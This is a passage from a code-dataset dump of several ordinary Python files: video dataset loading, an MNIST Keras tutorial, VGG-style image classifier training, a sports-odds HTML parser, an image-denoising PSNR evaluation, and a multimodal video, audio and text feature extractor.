'RGBDiff', 'ARP']:\n\t\t\tself.img_name_tmpl = self.modality.lower() + '_{:05d}' + self.image_extension\n\t\telif self.modality == 'Flow':\n\t\t\tself.img_name_tmpl = self.modality.lower() + '_{}_' + '_{:05d}' + self.image_extension\n\t\telse:\n\t\t\traise NotImplementedError(\n\t\t\t\t'Unsupported Modality for Temporal Dataset. '\n\t\t\t\t'Please implement for specified modality: %s' % self.modality\n\t\t\t)\n\n\tdef setup_metadata(self, opts):\n\t\tsuper(TemporalDataset, self).setup_metadata(opts)\n\n\t\t# Parse and map metadata to VideoMetadata (named_tuple)\n\t\tself.video_metadata_list = [\n\t\t\tVideoMetadata(directory, label, self.modality)\n\t\t\tfor directory, label in self.metadata_list\n\t\t]\n\t\treturn self.video_metadata_list\n\n\t@staticmethod\n\tdef modify_cli_options(parser, is_train):\n\t\tparser.add_argument('--modality', type=str, default='RGB',\n\t\t\thelp='Chooses modality for intended dataset. [RGB | RGBDiff | Flow | ARP]')\n\t\tparser.add_argument('--n_segments', type=int, default=3,\n\t\t\thelp='Number of video segments.')\n\t\tparser.add_argument('--sample_length', type=int, default=5,\n\t\t\thelp='Number of frames to be sampled in each segment')\n\t\tparser.add_argument('--random_shift', action='store_true',\n\t\t\thelp='Whether to sample video frames at random shift or at the middle of each segments')\n\n\t\treturn parser\n\n\tdef __getitem__(self, index):\n\t\tmetadata = self.video_metadata_list[index]\n\t\tdirectory = metadata.directory\t\t# directory of video frames (single dataset)\n\t\tn_frames = metadata.n_frames\t\t# number of frames in directory having same modality\n\t\tlabel = metadata.label\t\t\t\t# class label\n\n\t\tframe_indices = generate_video_indices(\n\t\t\tself.n_segments, n_frames,\n\t\t\tself.sample_length, self.random_shift)\n\n\t\t# iterate frame_generator to get frames and respective label\n\t\timgs = list(\n\t\t\tload_video_frames(frame_indices, directory,\n\t\t\t\tself.img_name_tmpl, self.modality)\n\t\t)\n\t\tprint(len(imgs), n_frames)\n\t\timgs = self.group_transforms(imgs)\n\n\t\treturn imgs, label\n\n","sub_path":"core/dataset/temporal_dataset.py","file_name":"temporal_dataset.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"548058635","text":"import numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom matplotlib import pyplot as plt\n\n# The following lines adjust the granularity of reporting. \npd.options.display.max_rows = 10\npd.options.display.float_format = \"{:.3f}\".format\n\n# The following line improves formatting when ouputting NumPy arrays.\nnp.set_printoptions(linewidth = 200)\n\n# Load the dataset\n(x_train, y_train),(x_test, y_test) = tf.keras.datasets.mnist.load_data()\n\n\n# Output example #2917 of the training set.\n#print(x_train[2917])\n\n# Use false colors to visualize the array.\n#plt.imshow(x_train[2917])\n#plt.show()\n\n# Output row #10 of example #2917.\n#print(x_train[2917][10])\n\n# Output pixel #16 of row #10 of example #2900.\n#x_train[2917][10][16]\n\n\n# Normalize features values.\nx_train_normalized = x_train / 255.0\nx_test_normalized = x_test / 255.0\n\n# Define the plotting function\ndef plot_curve(epochs, hist, list_of_metrics):\n # list_of_metrics should be one of the names shown in:\n # https://www.tensorflow.org/tutorials/structured_data/imbalanced_data#define_the_model_and_metrics\n plt.figure()\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Value\")\n\n for m in list_of_metrics:\n x = hist[m]\n plt.plot(epochs[1:], x[1:], label = m)\n\n plt.legend()\n plt.show()\n\n\n\"\"\" Create and train the model. ------------------------------------------------------------------- \"\"\"\n# Create a deep neural net model\ndef create_model(my_learning_rate):\n model = tf.keras.models.Sequential()\n\n # The features are stored in a two-dimensional 28X28 array. Flatten that two-dimensional array into a a one-dimensional\n # 784-element array.\n model.add(tf.keras.layers.Flatten(input_shape=(28, 28)))\n\n # Define the first hiddel layer.\n model.add(tf.keras.layers.Dense(units = 256, activation = \"relu\"))\n\n # Define a dropout regularization layer.\n model.add(tf.keras.layers.Dropout(rate = 0.2))\n\n # Define the second hiddel layer.\n model.add(tf.keras.layers.Dense(units = 128, activation = \"relu\"))\n\n # Define the output layer. The units parameter is set to 10 because the model must choose among 10 possible output values (representing\n # the digits from 0 to 9, inclusive).\n model.add(tf.keras.layers.Dense(units = 10, activation = \"softmax\"))\n\n # Notice that the loss function for multi-class classification is different than the loss function for binary classification.\n model.compile(optimizer = tf.keras.optimizers.Adam(lr = my_learning_rate),\n loss = \"sparse_categorical_crossentropy\",\n metrics = [\"accuracy\"])\n \n return model\n\n# Train the model\ndef train_model(model, train_features, train_label, epochs, batch_size = None, validation_split = 0.1):\n history = model.fit(x = train_features, y = train_label, epochs = epochs, batch_size = batch_size, shuffle = True,\n validation_split = validation_split)\n\n epochs = history.epoch\n hist = pd.DataFrame(history.history)\n\n return epochs, hist\n\n\"\"\" Invoke the previous functions. --------------------------------------------------------------- \"\"\"\nleaning_rate = 0.003\nepochs = 50\nbatch_size = 4000\nvalidation_split = 0.2\n\n# Establish the model's topography.\nmy_model = create_model(leaning_rate)\n\n# Train the model on the normalized training set.\nepochs, hist = train_model(my_model, x_train_normalized, y_train, epochs, batch_size, validation_split)\n\n# Plot a graph of the metric vs. epochs.\nlist_of_metrics_to_plot = [\"accuracy\"]\nplot_curve(epochs, hist, list_of_metrics_to_plot)\n\n# Evaluate the model against the test set.\nmy_model.evaluate(x = x_test_normalized, y = y_test, batch_size = batch_size)\n\n\n\n\n\n","sub_path":"01_Courses/01_Crash_Course/09_multi-class_classification_MNIST.py","file_name":"09_multi-class_classification_MNIST.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"112619988","text":"# python train_vgg.py --dataset_2 train_data --modelsaved output/smallvggnet.modelsaved --label-bin output/smallvggnet_lb.pickle --plot output/smallvggnet_plot.png\n# PyImage/tutorial/train_vgg.py\nimport matplotlib\nmatplotlib.use(\"Agg\") # set the matplotlib backend so figures can be saved in the background\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.optimizers import SGD\nfrom imutils import paths\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport pickle\nimport cv2\nimport os\nfrom .pyimagesearch.smallvggnet import SmallVGGNet\nfrom .constants import *\n\ndata = []\nlabels = []\n\n# 이미지 경로를 잡고 무작위로 섞음\nimagePaths = sorted(list(paths.list_images(FLG.TRAIN_DATA_PATH)))\nrandom.seed(42)\nrandom.shuffle(imagePaths)\n\n# loop over the input test_data\nfor imagePath in imagePaths:\n # load the image, resize it to 64x64 pixels (the required input spatial dimensions of SmallVGGNet), and store the image in the data list\n image = cv2.imread(imagePath)\n image = cv2.resize(image, (64, 64))\n data.append(image)\n\n # extract the class label from the image path and update the labels list\n label = imagePath.split(os.path.sep)[-2]\n labels.append(label)\n\n# scale the raw pixel intensities to the range [0, 1]\ndata = np.array(data, dtype=\"float\") / 255.0\nlabels = np.array(labels)\n\n(trainX, testX, trainY, testY) = train_test_split(data, labels, test_size=0.25, random_state=42)\n\n# convert the labels from integers to vectors (for 2-class, binary classification you should use Similartiy' to_categorical function instead as the scikit-learn's LabelBinarizer will not return a vector)\nlb = LabelBinarizer()\ntrainY = lb.fit_transform(trainY)\ntestY = lb.transform(testY)\n\n# construct the image generator for data augmentation\naug = ImageDataGenerator(rotation_range=30, width_shift_range=0.1, height_shift_range=0.1, shear_range=0.2, zoom_range=0.2, horizontal_flip=True, fill_mode=\"nearest\")\n\n# initialize our VGG-like Convolutional Neural Network\nmodel = SmallVGGNet.build(width=64, height=64, depth=3, classes=len(lb.classes_))\n\n\n# initialize the modelsaved and optimizer (you'll want to use binary_crossentropy for 2-class classification)\nprint(\"[INFO] training network...\")\nopt = SGD(lr=FLG.INIT_LR, decay=FLG.INIT_LR / FLG.EPOCHS)\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=opt, metrics=[\"accuracy\"])\n\n# train the network\nH = model.fit_generator(aug.flow(trainX, trainY,\n\t\t\t\t\t\t\t\t batch_size=FLG.BATCH_SIZE),\n\t\t\t\t\t\tvalidation_data=(testX, testY),\n\t\t\t\t\t\tsteps_per_epoch=len(trainX) // FLG.BATCH_SIZE,\n\t\t\t\t\t\tepochs=FLG.EPOCHS)\n\n# evaluate the network\nprint(\"[INFO] evaluating network...\")\npredictions = model.predict(testX, batch_size=32)\nprint(classification_report(testY.argmax(axis=1), predictions.argmax(axis=1), target_names=lb.classes_))\n\n# plot the training loss and accuracy\nN = np.arange(0, FLG.EPOCHS)\nplt.style.use(\"ggplot\")\nplt.figure()\nplt.plot(N, H.history[\"loss\"], label=\"train_loss\")\nplt.plot(N, H.history[\"val_loss\"], label=\"val_loss\")\nplt.plot(N, H.history[\"acc\"], label=\"train_acc\")\nplt.plot(N, H.history[\"val_acc\"], label=\"val_acc\")\nplt.title(\"Training Loss and Accuracy (SmallVGGNet)\")\nplt.xlabel(\"Epoch #\")\nplt.ylabel(\"Loss/Accuracy\")\nplt.legend()\nplt.savefig(FLG.PLOT_VGG)\n\n# save the modelsaved and label binarizer to disk\nprint(\"[INFO] serializing network and label binarizer...\")\nmodel.save(FLG.MODEL_VGG)\nf = open(FLG.LANEL_BIN_VGG, \"wb\")\nf.write(pickle.dumps(lb))\nf.close()","sub_path":"Examples/SampleNet/train_vgg.py","file_name":"train_vgg.py","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"649693806","text":"import scrapy\nfrom bs4 import BeautifulSoup\nfrom classes import Odds\nfrom mlbMethods import convertTeamName\n\ndef getOdds(file):\n f = open(file, \"r\")\n\n if (file == \"P:/DFS_mlbData/VegasOdds/06-04-2019_odds.html\"):\n print (\"Data is fucked: \" + file)\n return ([])\n\n # makes a data structure for html page using Beautifulsoup library\n soup = BeautifulSoup(f.read(), 'html.parser')\n\n # narrows the html down to just the table tag\n table = soup.table\n\n # creates 2 arrays with all the relevent rows\n try:\n rows1 = table.find_all(class_=\"statistics_table_alternateRow\")\n except AttributeError:\n print (\"Data is Fucked: \" + file)\n return ([])\n rows2 = table.find_all(class_=\"statistics_table_row\")\n\n # creates a list - each entry contains 2 lines like Miami Marlins (that is one of the lines) - the 2 entries are the matchup\n teams = []\n for rows in rows1:\n teams.append(rows.find_all(class_=\"oddsTeamWLink\"))\n for rows in rows2:\n teams.append(rows.find_all(class_=\"oddsTeamWLink\"))\n\n # for each individual element (two lines), it looks at each individual line. Creates an Odds object and adds the teams (not actually based on who is favored yet), then puts each Odds object into an array.\n # the array matches will contain an array of Odds objects that represent each match for the day\n matches = []\n for matchups in teams:\n tempOdds = Odds()\n for a in matchups:\n if (('fav' in tempOdds)):\n tempOdds['dog'] = convertTeamName(a.string)\n else:\n tempOdds['fav'] = convertTeamName(a.string)\n matches.append(tempOdds)\n\n # creates an array with every element being another array (representing a matchup) containing the money line and total\n oddsList = []\n for rows in rows1:\n oddsList.append(rows.find_all(class_=\"alignRight bookColumn\")[3].contents)\n for rows in rows2:\n oddsList.append(rows.find_all(class_=\"alignRight bookColumn\")[3].contents)\n\n count = 0\n try:\n for matchups in oddsList:\n if (float(matchups[0].string) < 0):\n matches[count]['ml'] = int(matchups[0].string)\n matches[count]['ou'] = float(matchups[1].string)\n else:\n temp = matches[count]['fav']\n matches[count]['fav'] = matches[count]['dog']\n matches[count]['dog'] = temp\n matches[count]['ml'] = int(matchups[1].string)\n matches[count]['ou'] = float(matchups[0].string)\n count = count + 1\n except ValueError:\n if (matchups[0].string == \"PK\"):\n matches[count]['ml'] = -100\n matches[count]['ou'] = float(matchups[1].string)\n else:\n matches[count]['ml'] = \"N/A\"\n matches[count]['ou'] = \"N/A\"\n return (matches)\n","sub_path":"Parsers/OddsParser.py","file_name":"OddsParser.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"235322689","text":"'''\n2021.02.22\nSalt And Pepper Noise 제거 알고���즘 구현\nMF: opencv api\nAMF: NAMF의 Step1에 해당하는 내용 구현 (논문 구현 Code 파이썬 포팅)\nNAMF: NAMF 논문 Step1 + Step2 (논문 구현 Code 파이썬 포팅)\nProposed1 : AMF+거리 기반 weighted sum\nProposed2 : Proposed1 + bilateral\nProposed3 : namf + 거리 기반 weighted sum + bilateral\nProposed4 : proposed3 + 자신 weight 포함\nProposed5 : Proposed1 + pixel 신뢰도 weight average\n'''\nimport cv2\n\nimport implemetation_bykim as imp_bykim\n\nif __name__ == '__main__':\n\n #처음 다양한 noise level의 noisy image를 생성하여 저장 (실행때마다 동일한 결과가 나오도록 (rand때문에 계속 다른 결과))-------\n #generation_noise_images()\n #--------------------------------------------------------------------------------------------------------------\n\n #이미지 로드 (우선은 매트릭스로 테스트 (4x3)\n # img = np.arange(0,12).reshape(3,4)\n\n originimages = [] # 전체 테스트 영상\n for i in range(1, 53):\n fname = \"testset/[test{0:02d}]_origin.bmp\".format(i)\n originimages.append(fname)\n # print(filenames)\n\n\n noiseimages = [] # 전체 테스트 영상\n noise_probs = [0.1, 0.3, 0.5, 0.7, 0.9]\n for i in range(1, 53):\n for noise_prob in noise_probs:\n fname = \"noiseimage/[test{0:02d}]_origin_{1:.2f}.png\".format(i, noise_prob)\n noiseimages.append(fname)\n print(len(noiseimages))\n\n # img = cv2.imread('testset/[test01]_origin.bmp', cv2.IMREAD_GRAYSCALE)\n\n\n f= open('psnrs.csv','w')\n f.write(\"image, mf,amf,namf,proposed1,proposed2,proposed3,proposed4,proposed5\\n\")\n\n for num in range(0,260):\n\n img = cv2.imread(originimages[num//5], cv2.IMREAD_GRAYSCALE)\n # cv2.namedWindow('original img', cv2.WINDOW_NORMAL)\n # cv2.imshow('original img', img)\n # cv2.waitKey(0)\n\n #noisy_img=sp_noise(img, 0.6)\n\n #noisy_img=sp_noise_to_file(img, 0.6, '[test01]_origin')\n noisy_img = cv2.imread(noiseimages[num], cv2.IMREAD_GRAYSCALE)\n noisy_img_clone = noisy_img.copy()\n\n # 4가지 방법(mf, amf, namf, bilateral) psnr 파일로 저장하기\n # print(\"noisy_img PSNR = {0:.3f}\".format(cv2.PSNR(img, noisy_img)))\n # restored_image0 = cv2.medianBlur(noisy_img, 3)\n # print(\"restored_image0 (mf) PSNR = {0:.3f}\".format(cv2.PSNR(img, restored_image0)))\n # restored_image1, restored_image2, restored_image3 = amf(noisy_img, 2, 20, 0.8)\n # print(\"restored_image1 (amf) PSNR = {0:.3f}\".format(cv2.PSNR(img, restored_image1)))\n # print(\"restored_image2 (namf) PSNR = {0:.3f}\".format(cv2.PSNR(img, restored_image2)))\n # print(\"restored_image3 (+bilateral) PSNR = {0:.3f}\".format(cv2.PSNR(img, restored_image3)))\n\n # amf, namf, proposed = imp_bykim.amf(noisy_img, 2, 20, 0.8)\n # print(\"amf (amf) PSNR = {0:.3f}\".format(cv2.PSNR(img, amf)))\n # print(\"namf (namf) PSNR = {0:.3f}\".format(cv2.PSNR(img, namf)))\n # print(\"proposed (proposed) PSNR = {0:.3f}\".format(cv2.PSNR(img, proposed)))\n\n #PSNR 계산하기 (함수에서 noisy_img가 변형되어 호출 전 clone으로 복사 후 진행)\n\n mf_byopencv=cv2.medianBlur(noisy_img, 3)\n mf_byopencv_psnr=cv2.PSNR(img, mf_byopencv)\n print(\"mf_byopencv (mf) PSNR = {0:.3f}\".format(mf_byopencv_psnr))\n noisy_img=noisy_img_clone.copy()\n amf_bykim = imp_bykim.amf_bykim(noisy_img, 2, 20, 0.8)\n amf_bykim_psnr=cv2.PSNR(img, amf_bykim)\n print(\"amf_bykim (amf) PSNR = {0:.3f}\".format(amf_bykim_psnr))\n noisy_img = noisy_img_clone.copy()\n namf_bykim=imp_bykim.namf_bykim(noisy_img, 2, 20, 0.8)\n namf_bykim_psnr=cv2.PSNR(img, namf_bykim)\n print(\"namf_bykim (namf) PSNR = {0:.3f}\".format(namf_bykim_psnr))\n noisy_img = noisy_img_clone.copy()\n proposed1_bykim=imp_bykim.proposed1_bykim(noisy_img, 2, 20, 0.8)\n proposed1_bykim_psnr=cv2.PSNR(img, proposed1_bykim)\n print(\"proposed1_bykim (#amf+거리 기반 weighted sum) PSNR = {0:.3f}\".format(proposed1_bykim_psnr))\n noisy_img = noisy_img_clone.copy()\n proposed2_bykim=imp_bykim.proposed2_bykim(noisy_img, 2, 20, 0.8)\n proposed2_bykim_psnr = cv2.PSNR(img, proposed2_bykim)\n print(\"proposed2_bykim (#proposed1 + bilateral) PSNR = {0:.3f}\".format(proposed2_bykim_psnr))\n noisy_img = noisy_img_clone.copy()\n proposed3_bykim=imp_bykim.proposed3_bykim(noisy_img, 2, 20, 0.8)\n proposed3_bykim_psnr = cv2.PSNR(img, proposed3_bykim)\n print(\"proposed3_bykim (#namf + 거리 기반 weighted sum + bilateral) PSNR = {0:.3f}\".format(proposed3_bykim_psnr))\n noisy_img = noisy_img_clone.copy()\n proposed4_bykim = imp_bykim.proposed4_bykim(noisy_img, 2, 20, 0.8)\n proposed4_bykim_psnr = cv2.PSNR(img, proposed4_bykim)\n print(\"proposed4_bykim ( #proposed3 + 자신 weight 포함) PSNR = {0:.3f}\".format(proposed4_bykim_psnr))\n noisy_img = noisy_img_clone.copy()\n proposed5_bykim = imp_bykim.proposed5_bykim(noisy_img, 2, 20, 0.8)\n proposed5_bykim_psnr = cv2.PSNR(img, proposed5_bykim)\n print(\"proposed5_bykim (#proposed1 + pixel 신뢰도 weight average) PSNR = {0:.3f}\".format(proposed5_bykim_psnr))\n\n #psnr file로 저장\n f.write(\"{8},{0:.3f},{1:.3f},{2:.3f},{3:.3f},{4:.3f},{5:.3f},{6:.3f},{7:.3f}\\n\".format(mf_byopencv_psnr,amf_bykim_psnr,namf_bykim_psnr,proposed1_bykim_psnr,proposed2_bykim_psnr,proposed3_bykim_psnr,proposed4_bykim_psnr,proposed5_bykim_psnr,noiseimages[num]))\n\n '''\n # 그림 순서대로 한장씩 띄우기\n cv2.namedWindow('noisy image', cv2.WINDOW_NORMAL)\n cv2.imshow('noisy image', noisy_img)\n print(\"noisy_img PSNR = {0:.3f}\".format(cv2.PSNR(img, noisy_img)))\n cv2.waitKey(0)\n\n restored_image0=cv2.medianBlur(noisy_img,3)\n cv2.namedWindow('restored_image0 (mf)', cv2.WINDOW_NORMAL)\n cv2.imshow('restored_image0 (mf)', restored_image0)\n print(\"restored_image0 (mf) PSNR = {0:.3f}\".format(cv2.PSNR(img, restored_image0)))\n cv2.waitKey(0)\n\n restored_image1, restored_image2, restored_image3 = amf(noisy_img, 2, 20, 0.8)\n\n cv2.namedWindow('restored_image1 (amf)', cv2.WINDOW_NORMAL)\n cv2.imshow('restored_image1 (amf)', restored_image1)\n print(\"restored_image1 (amf) PSNR = {0:.3f}\".format(cv2.PSNR(img, restored_image1)))\n cv2.waitKey(0)\n\n cv2.namedWindow('restored_image2 (namf)', cv2.WINDOW_NORMAL)\n cv2.imshow('restored_image2 (namf)', restored_image2)\n print(\"restored_image2 (namf) PSNR = {0:.3f}\".format(cv2.PSNR(img, restored_image2)))\n cv2.waitKey(0)\n\n #restored_image3=cv2.bilateralFilter(restored_image2, 5, 10, 10)\n cv2.namedWindow('restored_image3 (+bilateral)', cv2.WINDOW_NORMAL)\n cv2.imshow('restored_image3 (+bilateral)', restored_image3)\n print(\"restored_image3 (+bilateral) PSNR = {0:.3f}\".format(cv2.PSNR(img, restored_image3)))\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n '''\n\n f.close()\n","sub_path":"main_old.py","file_name":"main_old.py","file_ext":"py","file_size_in_byte":7165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"288742833","text":"from __future__ import unicode_literals\r\nimport sys, os\r\nimport numpy as np\r\nimport cv2\r\nimport time\r\nimport tensorflow as tf\r\nimport json\r\n\r\nfrom src.feats_extract.imgfeat_extractor.youtube8M_extractor import YouTube8MFeatureExtractor\r\nfrom src.feats_extract.imgfeat_extractor.finetuned_resnet101 import FinetunedResnet101Extractor\r\nfrom src.feats_extract.txt_extractor.text_requests import VideoASR, VideoOCR, ImageOCR\r\nfrom src.feats_extract.audio_extractor import vggish_input, vggish_params, vggish_postprocess, vggish_slim\r\n\r\n\r\nFRAMES_PER_SECOND = 1\r\nPCA_PARAMS = \"pretrained/vggfish/vggish_pca_params.npz\" # 'Path to the VGGish PCA parameters file.'\r\nVGGISH_CHECKPOINT = 'pretrained/vggfish/vggish_model.ckpt'\r\nCAP_PROP_POS_MSEC = 0\r\n\r\n\r\nclass MultiModalFeatureExtract(object):\r\n \"\"\"docstring for ClassName\"\"\"\r\n\r\n def __init__(self, batch_size=1,\r\n imgfeat_extractor='Youtube8M',\r\n data_aug=False,\r\n extract_video=True,\r\n extract_audio=True,\r\n extract_text=True):\r\n super(MultiModalFeatureExtract, self).__init__()\r\n self.extract_video = extract_video\r\n self.extract_audio = extract_audio\r\n self.extract_text = extract_text\r\n self.data_aug = data_aug\r\n\r\n # Video Extract\r\n if extract_video:\r\n self.batch_size = batch_size\r\n if imgfeat_extractor == 'Youtube8M':\r\n self.extractor = YouTube8MFeatureExtractor(use_batch=batch_size != 1)\r\n elif imgfeat_extractor == 'FinetunedResnet101':\r\n self.extractor = FinetunedResnet101Extractor()\r\n elif imgfeat_extractor == 'InceptionResnetV2':\r\n from src.feats_extract.imgfeat_extractor.inception_resnet_v2 import InceptionResnetV2Extractor\r\n self.extractor = InceptionResnetV2Extractor()\r\n elif imgfeat_extractor == 'vit':\r\n from src.feats_extract.imgfeat_extractor.video_transformer import VideoTransformerExtractor\r\n self.extractor = VideoTransformerExtractor()\r\n else:\r\n raise NotImplementedError(imgfeat_extractor)\r\n\r\n if extract_audio:\r\n self.pproc = vggish_postprocess.Postprocessor(PCA_PARAMS) # audio pca\r\n self.audio_graph = tf.Graph()\r\n config = tf.ConfigProto(allow_soft_placement=True,\r\n log_device_placement=True)\r\n config.gpu_options.allow_growth = True\r\n with self.audio_graph.as_default():\r\n # 音频\r\n self.audio_sess = tf.Session(graph=self.audio_graph, config=config)\r\n vggish_slim.define_vggish_slim(training=False)\r\n vggish_slim.load_vggish_slim_checkpoint(self.audio_sess, VGGISH_CHECKPOINT)\r\n self.features_tensor = self.audio_sess.graph.get_tensor_by_name(\r\n vggish_params.INPUT_TENSOR_NAME)\r\n self.embedding_tensor = self.audio_sess.graph.get_tensor_by_name(\r\n vggish_params.OUTPUT_TENSOR_NAME)\r\n\r\n if extract_text:\r\n self.video_ocr_extractor = VideoOCR()\r\n self.video_asr_extractor = VideoASR()\r\n self.image_ocr_extractor = ImageOCR()\r\n\r\n def frame_iterator(self, filename, every_ms=1000, max_num_frames=300):\r\n \"\"\"Uses OpenCV to iterate over all frames of filename at a given frequency.\r\n\r\n Args:\r\n filename: Path to video file (e.g. mp4)\r\n every_ms: The duration (in milliseconds) to skip between frames.\r\n max_num_frames: Maximum number of frames to process, taken from the\r\n beginning of the video.\r\n\r\n Yields:\r\n RGB frame with shape (image height, image width, channels)\r\n \"\"\"\r\n video_capture = cv2.VideoCapture()\r\n if not video_capture.open(filename):\r\n print(sys.stderr, 'Error: Cannot open video file ' + filename)\r\n return\r\n last_ts = -99999 # The timestamp of last retrieved frame.\r\n num_retrieved = 0\r\n\r\n while num_retrieved < max_num_frames:\r\n # Skip frames\r\n while video_capture.get(CAP_PROP_POS_MSEC) < every_ms + last_ts:\r\n if not video_capture.read()[0]:\r\n return\r\n\r\n last_ts = video_capture.get(CAP_PROP_POS_MSEC)\r\n has_frames, frame = video_capture.read()\r\n if not has_frames:\r\n break\r\n yield frame\r\n num_retrieved += 1\r\n\r\n def frame_iterator_list(self, filename, every_ms=1000, max_num_frames=300):\r\n video_capture = cv2.VideoCapture()\r\n if not video_capture.open(filename):\r\n print(sys.stderr, 'Error: Cannot open video file ' + filename)\r\n return\r\n last_ts = -99999 # The timestamp of last retrieved frame.\r\n num_retrieved = 0\r\n\r\n frame_all = []\r\n while num_retrieved < max_num_frames:\r\n # Skip frames\r\n while video_capture.get(CAP_PROP_POS_MSEC) < every_ms + last_ts:\r\n if not video_capture.read()[0]:\r\n return frame_all\r\n\r\n last_ts = video_capture.get(CAP_PROP_POS_MSEC)\r\n has_frames, frame = video_capture.read()\r\n if not has_frames:\r\n break\r\n frame_all.append(frame[:, :, ::-1])\r\n num_retrieved += 1\r\n\r\n return frame_all\r\n\r\n def extract_feat(self, test_file,\r\n frame_npy_path=None, audio_npy_path=None, txt_file_path=None,\r\n image_jpg_path=None, save=True):\r\n filetype = test_file.split('.')[-1]\r\n if filetype in ['mp4', 'avi']:\r\n feat_dict = self.extract_video_feat(test_file, frame_npy_path, audio_npy_path, txt_file_path,\r\n image_jpg_path, save)\r\n elif filetype in ['jpg', 'png']:\r\n feat_dict = self.extract_image_feat(test_file)\r\n else:\r\n raise NotImplementedError\r\n if save:\r\n if 'video' in feat_dict:\r\n np.save(frame_npy_path, feat_dict['video'])\r\n print('保存视频特征为{}'.format(frame_npy_path))\r\n if 'audio' in feat_dict:\r\n np.save(audio_npy_path, feat_dict['audio'])\r\n print('保存音频特征为{}'.format(audio_npy_path))\r\n if 'text' in feat_dict:\r\n with open(txt_file_path, 'w') as f:\r\n f.write(feat_dict['text'])\r\n print('保存文本特征为{}'.format(txt_file_path))\r\n if 'image' in feat_dict and filetype == 'mp4':\r\n cv2.imwrite(image_jpg_path, feat_dict['image'][:, :, ::-1])\r\n return feat_dict\r\n\r\n def extract_image_feat(self, test_file):\r\n feat_dict = {}\r\n feat_dict['image'] = cv2.imread(test_file, 1)[:, :, ::-1] # convert to rgb\r\n\r\n if self.extract_text:\r\n start_time = time.time()\r\n image_ocr = self.image_ocr_extractor.request(test_file)\r\n feat_dict['text'] = json.dumps({'image_ocr': image_ocr}, ensure_ascii=False)\r\n end_time = time.time()\r\n print(\"text extract cost {} sec\".format(end_time - start_time))\r\n return feat_dict\r\n\r\n def extract_video_feat(self, test_file,\r\n frame_npy_path=None, audio_npy_path=None, txt_file_path=None,\r\n image_jpg_path=None, save=True):\r\n feat_dict = {}\r\n # =============================================视频\r\n if (frame_npy_path is None or os.path.exists(frame_npy_path)) and save == True:\r\n pass\r\n else:\r\n start_time = time.time()\r\n if self.batch_size == 1:\r\n features_arr = []\r\n for rgb in self.frame_iterator(test_file, every_ms=1000.0 / FRAMES_PER_SECOND):\r\n rgb = self.data_argument(rgb)\r\n features = self.extractor.extract_rgb_frame_features(rgb[:, :, ::-1])\r\n features_arr.append(features)\r\n feat_dict['video'] = features_arr\r\n else:\r\n rgb_list = self.frame_iterator_list(test_file, every_ms=1000.0 / FRAMES_PER_SECOND)\r\n feat_dict['video'] = self.extractor.extract_rgb_frame_features_list(rgb_list, self.batch_size)\r\n end_time = time.time()\r\n print(\"video extract cost {} sec\".format(end_time - start_time))\r\n # =============================================图片抽帧\r\n if (image_jpg_path is None or os.path.exists(image_jpg_path)) and save == True:\r\n pass\r\n else:\r\n start_time = time.time()\r\n rgb_list = self.frame_iterator_list(test_file, every_ms=1000.0 / FRAMES_PER_SECOND)\r\n feat_dict['image'] = rgb_list[len(rgb_list) // 2]\r\n end_time = time.time()\r\n print(\"image extract cost {} sec\".format(end_time - start_time))\r\n # =============================================音频\r\n if (audio_npy_path is None or os.path.exists(audio_npy_path)) and save == True:\r\n # postprocessed_batch = np.load(audio_npy_path)\r\n pass\r\n else:\r\n start_time = time.time()\r\n output_audio = test_file.replace('.mp4', '.wav')\r\n if not os.path.exists(output_audio):\r\n command = 'ffmpeg -loglevel error -i ' + test_file + ' ' + output_audio\r\n os.system(command)\r\n # print(\"audio file not exists: {}\".format(output_audio))\r\n # return\r\n examples_batch = vggish_input.wavfile_to_examples(output_audio)\r\n [embedding_batch] = self.audio_sess.run([self.embedding_tensor],\r\n feed_dict={self.features_tensor: examples_batch})\r\n feat_dict['audio'] = self.pproc.postprocess(embedding_batch)\r\n end_time = time.time()\r\n print(\"audio extract cost {} sec\".format(end_time - start_time))\r\n # =============================================文本\r\n if (txt_file_path is None or os.path.exists(txt_file_path)) and save == True:\r\n pass\r\n elif self.extract_text:\r\n start_time = time.time()\r\n video_ocr = self.video_ocr_extractor.request(test_file)\r\n video_asr = self.video_asr_extractor.request(test_file)\r\n feat_dict['text'] = json.dumps({'video_ocr': video_ocr, 'video_asr': video_asr}, ensure_ascii=False)\r\n print(feat_dict['text'])\r\n end_time = time.time()\r\n print(\"text extract cost {} sec\".format(end_time - start_time))\r\n return feat_dict\r\n\r\n def data_argument(self, rgb_frame):\r\n if not self.data_aug:\r\n return rgb_frame\r\n from imgaug import augmenters as iaa\r\n\r\n seq = iaa.Sequential([\r\n iaa.CropAndPad(\r\n px=(0, 30)), # crop images from each side by 0 to 16px (randomly chosen)\r\n iaa.Fliplr(1), # horizontally flip 50% of the images\r\n iaa.Flipud(1),\r\n iaa.GaussianBlur(sigma=(0, 3.0)), # blur images with a sigma of 0 to 3.0\r\n # # iaa.Affine(\r\n # # scale={\"x\": (0.8, 1.2), \"y\": (0.8, 1.2)}, # scale images to 80-120% of their size, individually per axis\r\n # # translate_percent={\"x\": (-0.2, 0.2), \"y\": (-0.2, 0.2)}, # translate by -20 to +20 percent (per axis)\r\n # # rotate=(-45, 45), # rotate by -45 to +45 degrees\r\n # # shear=(-16, 16), # shear by -16 to +16 degrees\r\n # # order=[0, 1], # use nearest neighbour or bilinear interpolation (fast)\r\n # # cval=(0, 255), # if mode is constant, use a cval between 0 and 255\r\n # # mode=ia.ALL # use any of scikit-image's warping modes 